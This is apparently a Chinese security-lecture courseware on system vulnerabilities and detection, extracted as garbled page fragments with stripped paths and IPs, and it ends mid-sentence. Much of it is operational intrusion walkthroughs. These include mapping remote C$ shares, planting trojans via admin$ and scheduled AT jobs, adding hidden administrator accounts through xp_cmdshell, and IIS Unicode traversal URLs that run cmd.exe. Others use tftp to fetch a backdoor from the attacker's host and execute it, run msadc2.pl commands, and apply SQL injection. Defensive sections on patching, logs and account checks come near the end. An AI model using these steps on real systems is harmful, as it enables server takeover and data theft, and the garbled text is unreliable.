系統(tǒng)安全漏洞與安全檢測(cè)課件

1、藍(lán)盾網(wǎng)絡(luò)安全講座-張賀勛藍(lán)盾安全小組系統(tǒng)安全漏洞與安全檢測(cè)目錄漏洞的形成漏洞的分類漏洞的檢測(cè)工具漏洞的防范辦法安全檢測(cè)的目的常見安全檢測(cè)的內(nèi)容專業(yè)安全檢測(cè)的內(nèi)容一、漏洞形成后門：大型軟件、系統(tǒng)的編寫，是許多程序員共同完成。他們是將一個(gè)軟件或系統(tǒng)分成若干板塊，分工編寫，然后再匯總，測(cè)試。最后，修補(bǔ),發(fā)布。在軟件匯總時(shí)，為了測(cè)試方便，程序員總會(huì)留有后門；在測(cè)試以后再進(jìn)行修補(bǔ)這些后門，如果一旦疏忽（或是為某種目的故意留下），或是沒有發(fā)現(xiàn)，軟件發(fā)布后自然而然就成了漏洞。程序若干板塊之間的空隙：這里很容易出現(xiàn)連程序員的都沒想到的漏洞！藍(lán)盾安全小組網(wǎng)絡(luò)協(xié)議：網(wǎng)絡(luò)協(xié)議有TCP、UDP、ICMP、IGMP等。

2、其實(shí)，他們本來(lái)的用途是好的，但卻被別人用于不乏的活動(dòng)：例如，ICMP本來(lái)是用于尋找網(wǎng)絡(luò)相關(guān)信息，后來(lái)卻被用于網(wǎng)絡(luò)嗅探和攻擊；TCP本來(lái)是用于網(wǎng)絡(luò)傳輸，后來(lái)卻被用于泄漏用戶信息。程序員自身的素質(zhì)：程序員的自身對(duì)網(wǎng)絡(luò)安全認(rèn)識(shí)的不夠，寫出的程序自身就有漏洞。二、系統(tǒng)漏洞的分類 操作系統(tǒng)漏洞 應(yīng)用平臺(tái)的漏洞 應(yīng)用系統(tǒng)的漏洞 網(wǎng)絡(luò)系統(tǒng)漏洞操作系統(tǒng)的漏洞 弱口令弱口令就是用戶的操作密碼過(guò)于簡(jiǎn)單（如123）。描述：本漏洞的危害性極強(qiáng)，它可以對(duì)系統(tǒng)服務(wù)器作任何的操作。主要是因?yàn)楣芾韱T的安全意識(shí)不足。測(cè)試目的：用本漏洞控制服務(wù)器系統(tǒng)。（1）我們可以用爆力破解工具或掃描器（XSCAN等）對(duì)機(jī)器進(jìn)行掃描，可得到管理

3、員密碼。只要擁有管理員級(jí)權(quán)限，就能完全共享應(yīng)用對(duì)方的機(jī)器，如下面的命令會(huì)將對(duì)方的C盤映射為自己的X盤：c:net use x: 目標(biāo)主機(jī)的IP地址c$ 密碼 /user:用戶名其中c$為系統(tǒng)默認(rèn)共享，依此類推，同樣可以共享對(duì)方的d$,e$ （2）運(yùn)行AT命令 。C:net start scheduleSchedule 正在啟動(dòng)服務(wù). Schedulw 服務(wù)啟動(dòng)成功。AT的語(yǔ)法：AT computername time command比如：AT computername time runnc.bat（3）用遠(yuǎn)程控制終端輸入法漏洞 描述：輸入法漏洞可以說(shuō)是中文Windows2000推出后的第一個(gè)致

4、命漏洞,通過(guò)它我們可以做許多的事情,包括建立用戶.測(cè)試1：使用文件類型編輯創(chuàng)建管理員用戶：1.開機(jī)到登陸界面調(diào)出輸入法,如全拼-幫助-操作指南,跳出輸入法指南幫助文件 2.右擊選項(xiàng)按鈕,選擇跳至url 3.在跳至URL上添上c:,其它的也可. 4.幫助的右邊會(huì)進(jìn)入c:5.按幫助上的選項(xiàng)按鈕. 6.選internet選項(xiàng).會(huì)啟動(dòng)文件類型編輯框. 7.新建一個(gè)文件類型,如一個(gè)you文件類型,在跳出的文件后綴中添上you.確定. 8.選中文件類型框中的you文件類型,點(diǎn)擊下面的高級(jí)按鈕,會(huì)出現(xiàn)文件操作對(duì)話框. 9.新建一種文件操作,操作名任意寫,如ppp 10.該操作執(zhí)行的命令如下: C:WINNT

5、system32cmd.exe/cnetusermayi123456/add&C:WINNTsystem32cmd.exe/cnetlocalgroupadministrators aboutnt/add 完成后退出11.將c:的某個(gè)文件如pipi.txt改為pipi.txt.mayi,然后雙擊打開這個(gè)文件. 12.通常這個(gè)文件是打不開的,系統(tǒng)運(yùn)行一會(huì)便沒有了提示,但這時(shí)我們已經(jīng)將用戶mayi加上了,權(quán)限是管理員.13.返回,重新以aboutnt用戶登錄即可。 IPC$共享漏洞 描述：危害性大，主要是和其它漏洞一塊使用IPC$(Inter-Process Communication)共享是NT

6、計(jì)算機(jī)上的一個(gè)標(biāo)準(zhǔn)的隱含共享，它是用于服務(wù)器之間的通信的。NT計(jì)算機(jī)通過(guò)使用這個(gè)共享來(lái)和其他的計(jì)算機(jī)連接得到不同類型的信息的。常?？衫眠@一點(diǎn)來(lái)，通過(guò)使用空的IPC會(huì)話進(jìn)行攻擊。測(cè)試1：通過(guò)本漏洞猜測(cè)用戶密碼c:net use 目標(biāo)機(jī)器的IP地址ipc$ /user: 當(dāng)這個(gè)連接建立后，要將username和password送去加以確認(rèn)。如果你以Administrator登錄，則需要進(jìn)行口令猜測(cè)。 可以重復(fù)使用net命令，進(jìn)行username和password猜測(cè)： c:net use xxx.xxx.xxx.xxxipc$ /user: 也可以使用腳本語(yǔ)句： open(IPC, net us

7、e xxx.xxx.xxx.xxxipc$ /user: );看看目標(biāo)計(jì)算機(jī)上有那些共享的資源可以用下面命令： c:net view 目標(biāo)計(jì)算機(jī)的IP地址 一旦IPC$共享順利完成，下一個(gè)命令是： c:net use g: xxx.xxx.xxx.xxxc$ 得到了C$共享，并將該目錄映射到g:，鍵入： c:dir g: /p 就能顯示這個(gè)目錄的所有內(nèi)容。 測(cè)試 2：通過(guò)測(cè)試1來(lái)上傳木馬控制服務(wù)器c:net use ipc$ ” /user:”admin”此時(shí)，cmd會(huì)提示命令成功完成。這樣你就和建立了IPC連接。c:copy server.exe admin$上傳server.exe到的wi

8、nnt目錄，因?yàn)閣innt目錄里的東西比較多，管理員不容易發(fā)現(xiàn)，所以我們把server.exe上傳到里面。Server.exe是janker寫的winshell生成的程序，WinShell是一個(gè)運(yùn)行在Windows平臺(tái)上的Telnet服務(wù)器軟件。c:net time 這個(gè)命令可以的到的系統(tǒng)時(shí)間，例如是00：00c:at 00:01 ”server.exe”cmd會(huì)提示新加了一項(xiàng)任務(wù)，其作業(yè)ID為1，這樣遠(yuǎn)程系統(tǒng)會(huì)在00:01時(shí)運(yùn)行server.exe。c:at 1這樣可以查看ID為1的作業(yè)情況。c:net use ipc$ /delete退出IPC連接?，F(xiàn)在，server.exe已經(jīng)在遠(yuǎn)程主機(jī)

9、上運(yùn)行了。輸入：c:telnet 21（端口可以自己在winshell中設(shè)定）這樣就成功的telnet到上了。應(yīng)用平臺(tái)的漏洞 SQL SERVER存在的一些安全漏洞： “SA”帳號(hào)弱口令 描述：危害性極強(qiáng)，它可以完作控制系統(tǒng)服務(wù)器。存在“sa”帳戶，密碼就為空， 或密碼過(guò)于簡(jiǎn)單，我們就可以通過(guò)掃描工具（如X-SCAN等）得到密碼，用測(cè)試：通過(guò)XP-CMDSHEll來(lái)增加一個(gè)帳號(hào)如：Xp_cmdshell net user testuser /ADD 然后在：Xp_cmdshell net localgroup Administrators testuser /ADD 這樣攻擊者就成功的在SQL

10、 SERVER上增加了一個(gè)用戶。當(dāng)然遠(yuǎn)程的話，一般需要有1433口開著，通過(guò)MSSQL 客戶端進(jìn)行連接。最后你可以用添加的用戶名通過(guò)遠(yuǎn)程控制終端來(lái)控制你服務(wù)器系統(tǒng)。 擴(kuò)展存儲(chǔ)過(guò)程參數(shù)解析漏洞：描述：危害性極強(qiáng)，它可以完作控制系統(tǒng)服務(wù)器。起主要問題是在MSD中提供一個(gè)API函數(shù)srv_paraminfo(),它是用來(lái)擴(kuò)展存儲(chǔ)過(guò)程調(diào)用時(shí)解釋深入?yún)?shù)的，如:exec , , .如要查詢“c:winnt”的目錄樹，可以如下表達(dá)：exec xp_dirtree c:winnt但沒有檢查各個(gè)參數(shù)的長(zhǎng)度，傳遞相當(dāng)長(zhǎng)的字符串，就存在了覆蓋其他堆棧參數(shù)的可能導(dǎo)致緩沖溢出。目前已知受影響的擴(kuò)展存儲(chǔ)過(guò)程如下：xp_

11、printstatements (xprepl.dll)xp_proxiedmetadata (xprepl.dll) xp_SetSQLSecurity (xpstar.dll) 關(guān)于openrowset和opendatasource 描述：危害性極強(qiáng)，它可以完作控制系統(tǒng)服務(wù)器。利用openrowset發(fā)送本地命令,通常我們的用法是（包括MSDN的列子）如下 select*fromopenrowset(sqloledb,myserver;sa;,select*fromtable) 可見（即使從字面意義上看)openrowset只是作為一個(gè)快捷的遠(yuǎn)程數(shù)據(jù)庫(kù)訪問，它必須跟在select后面，也就

12、是說(shuō)需要返回一個(gè)recordset 那么我們能不能利用它調(diào)用xp_cmdshell呢？答案是肯定的！ select*fromopenrowset(sqloledb,server;sa;,setfmtonlyoffexecmaster.dbo.xp_cmdshelldirc:) 必須加上setfmtonlyoff用來(lái)屏蔽默認(rèn)的只返回列信息的設(shè)置，這樣xp_cmdshell返回的output集合就會(huì)提交給前面的select顯示，如果采用 默認(rèn)設(shè)置，會(huì)返回空集合導(dǎo)致select出錯(cuò)，命令也就無(wú)法執(zhí)行了。 那么如果我們要調(diào)用sp_addlogin呢，他不會(huì)像xp_cmdshell返回任何集合的，我們就

13、不能再依靠fmtonly設(shè)置了，可以如下操作 select*fromopenrowset(sqloledb,server;sa;,selectOK!execmaster.dbo.sp_addloginHectic) 這樣，命令至少會(huì)返回selectOK!的集合，你的機(jī)器商會(huì)顯示OK!，同時(shí)對(duì)方的數(shù)據(jù)庫(kù)內(nèi)也會(huì)增加一個(gè)Hectic的賬號(hào)，也就是說(shuō)，我們利用 selectOK!的返回集合欺騙了本地的select請(qǐng)求，是命令能夠正常執(zhí)行，通理sp_addsrvrolemember和opendatasource也可以如此操作！ IIS漏洞 IIS unicode漏洞 描述:危害性極強(qiáng)，可以完全的控制服務(wù)

14、器。對(duì)于IIS 5.0/4.0中文版，當(dāng)IIS收到的URL請(qǐng)求的文件名中包含一個(gè)特殊的編碼例如“%c1%hh”或者“%c0%hh”,它會(huì)首先將其解碼變成:0 xc10 xhh，然后嘗試打開這個(gè)文件，Windows 系統(tǒng)認(rèn)為0 xc10 xhh可能是unicode編碼，因此它會(huì)首先將其解碼，如果 0 x00= %hh (0 xc1 - 0 xc0) * 0 x40 + 0 xhh%c0%hh - (0 xc0 - 0 xc0) * 0 x40 + 0 xhh例如，在Windows 2000 簡(jiǎn)體中文版 + IIS 5.0 + SP1系統(tǒng)下測(cè)試：target/A.ida/%c1%00.idaIIS

15、會(huì)報(bào)告說(shuō) .ida 文件找不到這里: （0 xc1-0 xc0)*0 x40+0 x00=0 x40=target/A.ida/%c1%01.idaIIS會(huì)報(bào)告說(shuō) A.ida 文件找不到這里: （0 xc1-0 xc0)*0 x40+0 x01=0 x41=A攻擊者可以利用這個(gè)漏洞來(lái)繞過(guò)IIS的路徑檢查，去執(zhí)行或者打開任意的文件。測(cè)試 1：下面的URL可能列出當(dāng)前目錄的內(nèi)容：victim/scripts/.%c1%1c.%c1%1c.%c1%1c.%c1%1c./winnt/system32/cmd.exe?/c+dir測(cè)試2 ：利用這個(gè)漏洞查看系統(tǒng)文件內(nèi)容也是可能的：victim/a.asp

16、/.%c1%1c./.%c1%1c./winnt/win.ini測(cè)試 3： 刪除空的文件夾命令： x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+rd+c:snowspider 測(cè)試 4：刪除文件的命令: x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+del+c:autoexec.bak測(cè)試 5： Copy文件 xxx.xxx.xxx.xxx/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy%20c:winntrepairsam._%20c

17、: inetpubwwwroot 測(cè)試 5： 用木馬（用TFTP、NCX99）在地址欄里填入： /scripts/.%c1%1c./winnt/system32/cmd.exe?/c+tftp -i ?.?.?.? GET ncx99.exe c:inetpubscriptssr.exe ?.?.?.?為你自己的IP，注意：c:inetpubscriptssr.exe 其中c:inetpubscripts為主機(jī)服務(wù)器目錄，要看主機(jī)的具體情況而定，sr.exe為被改名的ncx99.exe（自己選名字吧）。 然后等待.大概3分鐘.IE瀏覽器左下角顯示完成，紅色漏斗消失，這時(shí)ncx99.exe已經(jīng)上

18、傳到主機(jī)c:inetpubscripts目錄了，您可以自己檢查一下。 再使用如下調(diào)用來(lái)執(zhí)行ncx99.exe(sr.exe) /scripts/.%c1%1c./winnt/system32/cmd.exe?/c+c:inetpubscriptssr.exe然后您就可以 telnet 99 printer遠(yuǎn)程緩存溢出漏洞緩存溢出:緩存溢出又稱為緩沖溢出，緩沖區(qū)指一個(gè)程序的記憶范圍(領(lǐng)域)，該領(lǐng)域是用來(lái)儲(chǔ)存一些數(shù)據(jù)，如電腦程序信息，中間計(jì)算結(jié)果，或者輸入?yún)?shù)。把數(shù)據(jù)調(diào)入緩沖區(qū)之前，程序應(yīng)該驗(yàn)證緩沖區(qū)有足夠的長(zhǎng)度以容納所有這些調(diào)入的數(shù)據(jù)。否則，數(shù)據(jù)將溢出緩沖區(qū)并覆寫在鄰近的數(shù)據(jù)上，當(dāng)它運(yùn)行時(shí)，就如

19、同改寫了程序。假如溢出的數(shù)據(jù)是隨意的，那它就不是有效的程序代碼，當(dāng)它試圖執(zhí)行這些隨意數(shù)據(jù)時(shí)，程序就會(huì)失敗。另一方面，假如數(shù)據(jù)是有效的程序代碼，程序?qū)?huì)按照數(shù)據(jù)提供者所設(shè)定的要求執(zhí)行代碼和新的功能。描述：漏洞的活動(dòng)范圍是：這是一個(gè)緩存溢出漏洞，這漏洞比以往的普通溢出存在更大的危害，主要有兩方面的原因：*在缺省安全的情況下，該漏洞可以被來(lái)自網(wǎng)絡(luò)的利用。*可以完全獲得和控制存在該漏洞的網(wǎng)站服務(wù)器。一旦溢出成功，他可以做他想做的一些事情，包括：安裝和運(yùn)行程序，重新配置服務(wù)，增加、改變或者刪除文件和網(wǎng)頁(yè)的內(nèi)容等等。漏洞的起因是：WIN2K在網(wǎng)絡(luò)打印ISAPI擴(kuò)展上缺少足夠的緩沖區(qū)檢查，當(dāng)一個(gè)發(fā)出特殊的請(qǐng)

20、求服務(wù)時(shí)產(chǎn)生緩存溢出，可以讓在本地系統(tǒng)執(zhí)行任意代碼。測(cè)試：通過(guò)IIS5HACK工具來(lái)檢用信息iis5hack someip 80 3iis5 remote .printer overflow. writen by sunxfor test only, dont used to hack, :pconnecting.sending.Now you can telnet to 99 portgood luck :)c:telnet 6 99Microsoft Windows 2000 Version 5.00.2195(C) Copyright 1985-2000 Microsoft Corp.C

21、:WINNTsystem32已經(jīng)進(jìn)入目標(biāo)主機(jī)，你想干什么就是你的事啦。 IIS Index Server(.ida/idq) ISAPI擴(kuò)展遠(yuǎn)程溢出漏洞描述：危害性極強(qiáng)，它可以完作控制系統(tǒng)服務(wù)器。微軟IIS缺省安裝情況下帶了一個(gè)索引服務(wù)器(Index Server,在Windows 2000下名為Index Service).缺省安裝時(shí)，IIS支持兩種腳本映射：管理腳本(.ida文件)、Inernet數(shù)據(jù)查詢腳本(.idq文件)。這兩種腳本都由一個(gè)ISAPI擴(kuò)展 - idq.dll來(lái)處理和解釋。由于idq.dll在處理某些URL請(qǐng)求時(shí)存在一個(gè)未經(jīng)檢查的緩沖區(qū)，如果攻擊者提供一個(gè)特殊格式的URL

22、,就可能引發(fā)一個(gè)緩沖區(qū)溢出。通過(guò)精心構(gòu)造發(fā)送數(shù)據(jù)，攻擊者可以改變程序執(zhí)行流程，執(zhí)行任意代碼。 成功地利用這個(gè)漏洞,攻擊者可以遠(yuǎn)程獲取Local System權(quán)限。測(cè)試:來(lái)控制服務(wù)器。運(yùn)行IDQGUI程序，出現(xiàn)一個(gè)窗口，填好要入侵的主機(jī)IP，選取所對(duì)應(yīng)的系統(tǒng)SP補(bǔ)丁欄，其他設(shè)置不改，取默認(rèn)。然后按右下角的IDQ益出鍵。 如果成功 如圖 如果不成功會(huì)提示連接錯(cuò)誤。連接成功后，我們打開WIN下的DOS狀態(tài)，輸入：NC -VV X.X.X.X 813 如果成功 如圖 不成功的話可以在IDQGUI程序里換另一個(gè)SP補(bǔ)丁欄試試，如果都不行，就放棄。換其他漏洞機(jī)器。4、應(yīng)用系統(tǒng)漏洞 編程語(yǔ)言漏洞 MDB數(shù)據(jù)

23、庫(kù)可下載漏洞描述：危害性強(qiáng)，可以得到網(wǎng)站的所有內(nèi)容。數(shù)據(jù)庫(kù)中一般存放的是客戶的帳號(hào)、密碼以及網(wǎng)站的中所有內(nèi)容，如果得到了數(shù)據(jù)庫(kù)，也就可以說(shuō)得到了網(wǎng)站的一功， 原理，WEB服務(wù)器遇到不能解釋的文件是就給下載， 測(cè)試：在地址欄輸入someurl/path/name.mdb，你會(huì)發(fā)現(xiàn)name.mdb的數(shù)據(jù)庫(kù)給下載下來(lái)。 SQL語(yǔ)句漏洞描述：危害性強(qiáng)，可以進(jìn)入網(wǎng)站的后臺(tái)應(yīng)用程序。假設(shè)沒有過(guò)濾必要的字符： select*fromloginwhereuser=$HTTP_POST_VARSuserandpass=$HTTP_POST_VARSpass 我們就可以在用戶框和密碼框輸入1or1=1通過(guò)驗(yàn)證了。

24、這是非常古董的方法了，這個(gè)語(yǔ)句會(huì)替換成這樣：select*fromloginwhereuser=1or1=1andpass=1or1=1 因?yàn)閛r1=1成立，所以通過(guò)了。解決的辦法最好就是過(guò)濾所有不必要的字符， Jsp代碼泄漏漏洞描述：危害性強(qiáng)，有可能可以查看到數(shù)據(jù)庫(kù)帳號(hào)密碼。 在訪問JSP頁(yè)面時(shí)，如果在請(qǐng)求URL的.jsp后綴后面加上一或多個(gè).、%2E、+、%2B、%5C、%20、%00 ，會(huì)泄露JSP源代碼。測(cè)試 :查看網(wǎng)頁(yè)源代碼localhost:8080/index.jsp 服務(wù)器會(huì)正常解釋。 localhost:8080/index.jsp. 只要在后面加上一個(gè).就會(huì)導(dǎo)致源代碼泄漏(

25、可以通過(guò)瀏覽器的查看源代碼看到)。 原因： 由于Windows在處理文件名時(shí)，將index.jsp和index.jsp.認(rèn)為是同一個(gè)文件。 CGI漏洞 x.htw or qfullhit.htw or iirturnh.htw描述：危害性強(qiáng)，IIS4.0上有一個(gè)應(yīng)用程序映射htw-webhits.dll，這是用于Index Server的點(diǎn)擊功能的。盡管你不運(yùn)行Index Server，該映射仍然有效。這個(gè)應(yīng)用程序映射存在漏洞，允許入侵者讀取本地硬盤上的文件，數(shù)據(jù)庫(kù)文件，和ASP源代碼。 一個(gè)攻擊者可以使用如下的方法來(lái)訪問系統(tǒng)中文件的內(nèi)容：victim/iissamples/issamples

26、/oop/qfullhit.htw?ciwebhitsfile=/././winnt/win.ini&cirestriction=none&cihilitetype=full就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 webhits.dll后接上./便可以訪問到Web虛擬目錄外的文件,下面我們來(lái)看個(gè)例子:somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

27、在瀏覽器中輸入該地址,便可以獲得該服務(wù)器上給定日期的Web日志文件. 在系統(tǒng)常見的.htw樣本文件有: /iissamples/issamples/oop/qfullhit.htw/iissamples/issamples/oop/qsumrhit.htw/iissamples/exair/search/qfullhit.htw/iissamples/exair/search/qsumrhit.hw/iishelp/iis/misc/iirturnh.htw 這個(gè)文件通常受loopback限制利用inetinfo.exe來(lái)調(diào)用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件,這樣

28、請(qǐng)求一個(gè).htw文件:url/default.htm.htw?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full這個(gè)請(qǐng)求肯定會(huì)失敗，但請(qǐng)注意,我們現(xiàn)在已經(jīng)調(diào)用到了webhits.dll,我們只要在一個(gè)存在的文件資源后面也就是在.htw前面加上一串特殊的數(shù)字( %20s ),就是在例子中default.htm后面加上這個(gè)代表空格的特殊數(shù)字,這樣我們便可以欺騙過(guò)web服務(wù)器從而達(dá)到我們的目的.由于在緩沖部分中.htw文件名字部分被刪除掉由于%20s這個(gè)

29、符號(hào),所以,當(dāng)請(qǐng)求傳送到webhits.dll的時(shí)候,便可以成功的打開該文件,并返回給客戶端,而且過(guò)程中并不要求系統(tǒng)中真的存在.htw文件。比如：url/default.htm%20s.htw?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 解決方法： hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶在文檔上highlighted（突出）他們?cè)妓阉鞯臈l目，這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳

30、遞給.htw文件，Webhits.dll是一個(gè)ISAPI應(yīng)用程序來(lái)處理請(qǐng)求，打開文件并返回結(jié)果，當(dāng)用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí)，他們就可以請(qǐng)求任意文件，結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞，你可以請(qǐng)求如下條目：victim/nosuchfile.htw如果你從服務(wù)器端獲得如下信息：format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞。這個(gè)問題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射，所以你只要取消這個(gè)映射就能避免這個(gè)漏洞，你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件，一般會(huì)發(fā)

31、現(xiàn)如下的程序：/iissamples/issamples/oop/qfullhit.htw/iissamples/issamples/oop/qsumrhit.htw/isssamples/exair/search/qfullhit.htw/isssamples/exair/search/qsumrhit.htw/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用) msadc 描述：IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問題是存在于RDS Datafactory，默認(rèn)情況下，它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中，這

32、命令會(huì)以設(shè)備用戶的身份運(yùn)行，其一般默認(rèn)情況下是SYSTEM用戶。 測(cè)試：結(jié)合木馬來(lái)控制服務(wù)器C:PerlBINperl -x msadc2.pl -h 目標(biāo)機(jī)xxx.xxx.xxx.xxx Please type the NT commandline you want to run (cmd /c assumed):ncmd /c 一般這里我用TFTP上傳我的木馬文件，但首先你得先設(shè)置好你的TFTP主機(jī) tftp -i get ntsrv.exe c:winntsystem32ntsrv.exe 這里 是我的TFTP主機(jī)，TFTP目錄下有NTSRV。EXE木馬 如果程序執(zhí)行成功，TFTP會(huì)顯示

33、文件傳輸?shù)倪M(jìn)度，然后再執(zhí)行PERL，將木馬激活 ，你再用木馬連上對(duì)方的機(jī)器，搞定 2、C:PerlBINperl -x msadc2.pl -h 目標(biāo)機(jī) cmd /c net user pt007 /add 3、C:PerlBINperl -x msadc2.pl -h 目標(biāo)機(jī) cmd /c net user pt007 ptlove 4、C:PerlBINperl -x msadc2.pl -h 目標(biāo)機(jī) cmd /c net localgroup administrators pt007 /add 5、C:PerlBINperl -x msadc2.pl -h 目標(biāo)機(jī) cmd /c c:wi

34、nntsystem32ncx99.exe uploader.exe 描述：本漏洞的危害性強(qiáng)，如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。 測(cè)試：上傳一個(gè)木馬在地址欄輸入： host/cgi-win/uploader.exe 會(huì)帶你到上傳頁(yè)面 三、漏洞檢測(cè)工具商業(yè)ISSBD-SCANNERN-STEALTHPROMISCAN自由HFNETCHK X-SCAN流光四、漏洞的解決辦法 打補(bǔ)丁 打?qū)?yīng)的補(bǔ)丁是最好的解決辦法，可以到微軟下載中心microsoft/downloads/search.asp下載所需的補(bǔ)丁。另注意以后要不斷下載升級(jí)補(bǔ)

35、丁。 用IIS LOCK TOOLS 防火墻五、安全檢測(cè)目地對(duì)系統(tǒng)漏洞的發(fā)現(xiàn)確定是否被入侵過(guò)1、日志的檢測(cè)（1）日志的分類操作系統(tǒng)安全日志應(yīng)用程序日志系統(tǒng)日志應(yīng)用系統(tǒng)其它HTTP狀態(tài)代碼說(shuō)明 200代碼表明了所有的工作一切正常，傳輸過(guò)程很成功 201代碼表明成功發(fā)出并執(zhí)行了一POST命令 202代碼表明客戶的命令由服務(wù)器接受以進(jìn)行處理 204代碼表明客戶的請(qǐng)求得到處理，服務(wù)器不能返回?cái)?shù)據(jù) 300代碼表明客戶請(qǐng)求的數(shù)據(jù)最近被移走 301代碼表明服務(wù)器發(fā)現(xiàn)客戶所請(qǐng)求的數(shù)據(jù)位于一個(gè)替代的臨時(shí)重定向的URL302代碼表明服務(wù)器建議客戶到一個(gè)替代的位置去請(qǐng)求數(shù)據(jù)303代碼表明出現(xiàn)了一個(gè)問題，服務(wù)器不能修

36、改請(qǐng)求數(shù)據(jù)400代碼表明客戶發(fā)出了一個(gè)異常的請(qǐng)求，因此不能被處理401代碼表明客戶試圖訪問一個(gè)未被授權(quán)的訪問的數(shù)理403代碼表明訪問被禁止404代碼表明文檔未找到500表明一個(gè)服務(wù)器不能恢復(fù)的內(nèi)部服務(wù)器錯(cuò)誤502代碼表明服務(wù)器過(guò)載目地：發(fā)現(xiàn)CGI漏洞入侵者，以及WEB服務(wù)的情況 安全性日志 安全性基本上捕獲那些成功和失敗審核事件，同時(shí)對(duì)這種事性的概述很簡(jiǎn)單。如下圖WIN2000系統(tǒng)日志IIS日志路徑：c:winntsystem32logfilew3svc1FTP日志路徑：c:winntsystem32logfileMSFTPSVC12、端口掃描作用：發(fā)現(xiàn)木馬和確定開通的服務(wù)。工具：SUPERS

37、CAN、PORTSCAN、3、網(wǎng)絡(luò)的監(jiān)視作用：發(fā)現(xiàn)網(wǎng)絡(luò)攻擊工具：TCPDUMP（LINUX）、WINDUMP（WINDOWS）、命今NETSTAT 4、檢查用戶帳號(hào)和組信息 啟動(dòng)用戶管理器程序，或者在命令行狀態(tài)下執(zhí)行net user、net group和net localgroup命令，查看當(dāng)前用戶和組清單，確保內(nèi)置GUEST帳號(hào)被禁止使用：看看是否有非法組成員存在。默認(rèn)安裝后的組都具有特殊權(quán)限，例如，Administrators組成員有權(quán)對(duì)本地系統(tǒng)做任何事情，Backup operators組成員有權(quán)讀取系統(tǒng)中的所有文件，PowerUsers組成員有權(quán)創(chuàng)建共享。不要讓一些不合適的用戶隱藏在這

38、些組中。 5、定時(shí)任務(wù)中是否存在可疑程序 檢查定時(shí)任務(wù)中是否存在可疑程序。攻擊者可以讓后門程序定時(shí)運(yùn)行，以便將來(lái)重新入侵。更進(jìn)一步地，要準(zhǔn)確核對(duì)定時(shí)任務(wù)所對(duì)應(yīng)的實(shí)際程序名是否合法。在命令行狀態(tài)下執(zhí)行“at”命令可以很方便地看到這些信息。6、臨時(shí)進(jìn)程 檢查是否存在臨時(shí)進(jìn)程。要獲取這些信息，可以借助任務(wù)管理器、也可以在命令行執(zhí)行pulist.exe和tlist.exe。pulist可以查看每個(gè)進(jìn)程由誰(shuí)啟動(dòng)，tlist -f 可以查看哪個(gè)進(jìn)程又啟動(dòng)了子進(jìn)程。7、檢測(cè)混雜模式的網(wǎng)卡作用：確認(rèn)是否被監(jiān)聽。軟件：PROMISCAN 嗅探行為已經(jīng)成為網(wǎng)絡(luò)安全的一個(gè)巨大威脅。通過(guò)網(wǎng)絡(luò)嗅探，一些惡意用戶能夠很容

39、易地竊取到絕密的文檔和任何人的隱私。要實(shí)現(xiàn)上述目的非常容易，惡意用戶只要從網(wǎng)絡(luò)上下載嗅探器并安全到自己的計(jì)算機(jī)就可以了。然而，卻沒有一個(gè)很好的方法來(lái)檢測(cè)網(wǎng)絡(luò)上的嗅探器程序,以下將討論使用地址解析協(xié)議(Address Resolution Protocol)報(bào)文來(lái)有效地檢測(cè)網(wǎng)絡(luò)上的嗅探器程序。原理和檢測(cè)方法: 例如：網(wǎng)絡(luò)上一臺(tái)IP地址為的PC(X)以太網(wǎng)地址是00-00-00-00-00-01，這臺(tái)PC(X)需要向網(wǎng)絡(luò)上另外一臺(tái)IP地址為0的PC(Y)發(fā)送消息。在發(fā)送之前，X首先發(fā)出一個(gè)ARP請(qǐng)求包查詢0對(duì)應(yīng)的以太網(wǎng)地址。查詢包的目的地址被設(shè)置為FF-FF-FF-FF-FF-FF(廣播)，從而本地網(wǎng)絡(luò)上的所有節(jié)點(diǎn)都可以收到這個(gè)包。收到之后，每個(gè)節(jié)點(diǎn)會(huì)檢查這個(gè)ARP包查詢的IP地址和本機(jī)的IP地址是否匹配。如果不同，就忽略這個(gè)ARP包；如果匹配(Y)就向X發(fā)出應(yīng)答。X收到應(yīng)答之后就緩存Y的IP/硬件地址。然后，X就可以向Y發(fā)送實(shí)際的數(shù)據(jù)。如果我